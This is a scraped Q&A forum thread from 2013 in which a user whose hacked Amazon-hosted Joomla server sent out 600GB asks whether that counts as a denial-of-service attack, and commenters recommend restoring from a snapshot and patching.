If someone downloaded 600GB , can that be a DOS attack

Partial answer as your question is unclear as you have changed terminology between the title to the body and you have asked multiple questions without question marks. So unsure if I missed something that was ment to be a question also

DDOS stands for distributed denial-of-service
DOS stands for denial-of-service

This was not a DDOS attack given the information provided, If you killed you Apache server you kinda performed a DOS attack on your self as you denied the service of your webpage.

If the CPU was at 100% usage it probably can be defined as a DOS attack as it was unlikely to be servicing pages during this time.

As for finding out what happened check logs and monitoring tools you had active at the time or contact Amazon to see if they can provide anymore insight on the network traffic you attracted.

50-3

Posted 2013-09-05T06:16:59.860

Reputation: 3 779

how can i contact amazon regarding that. will they help me – user22 – 2013-09-05T06:29:58.253

It's unlikely Amazon will investigate this any further. Your web server has been hacked, and that happens every day, probably thousands of times. Get over it and reinstall the machine – especially if you already know what the vulnerability was, why care for what exactly happened? – slhck – 2013-09-05T06:38:04.143

If they are billing for the network traffic wouldn't they have an obligation to show that network data? It would really only isolate a time - He will still have to re-install and try and Learn some more about security. – 50-3 – 2013-09-05T06:42:47.070

But i have fixed the vulnerability now. and deleted hacker scripts. can't just i keep my server. – user22 – 2013-09-05T06:49:23.787

Did you restore from a back-up then patch or patch over the "Removed" scripts? – 50-3 – 2013-09-05T06:50:13.853

I ahve removed the scripts, but have the amazon sanphots for evryday so i can restore to 3 days old and i dont have any data chnaged betwenn taht time so i can go back to previous snapshot – user22 – 2013-09-05T06:55:45.990

Coming from a corporate company with massive server farms all round the world restore a snapshot, Confirm the malicious files are not present and then patch. You have no real idea what happened during this incident play it safe because I have seen what happens when you don't and you don't want that! – 50-3 – 2013-09-05T07:03:02.680

thanks buddy , i followed ur adviced and system is up and running from previous snapshot. AWS made that too easy to restore. what can do prevents these. i winder why maldetect detect half files but not other half – user22 – 2013-09-05T07:14:58.243

3http://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server and http://security.stackexchange.com/questions/23842/advice-on-what-to-do-after-being-hacked are worth reading. The third thing you mentioned might indicate your system itself was compromised – Journeyman Geek – 2013-09-05T06:19:42.570

If data was transmitted even with Apache being turned off, I'd suggest you set up a new instance. – slhck – 2013-09-05T06:20:17.997

@slhck I knew what happened , there was vulnerability in mu site which the hacker exploited. it was this http://www.bugreport.ir/78/exploit.htm . i deleted those scripts and now system is ok. i know it was those scripts. i checked llast modified files in /var/www/html and then i got those files. i had maldetect installed and it also gave me the report and removed three files but it didn't remove other 2 php files which were also virus. i had to rmeove them and they causing the issue.

– user22 – 2013-09-05T06:33:02.393

1Is it relevant what happened? You already know the vulnerability that was exploited, so you know you can prevent a repeat by killing the server, acquiring a new one, and set that up with the patched Joomla version. – Jan Doggen – 2013-09-05T07:54:33.800

If someone downloaded 600GB , can that be a DOS attack

Answers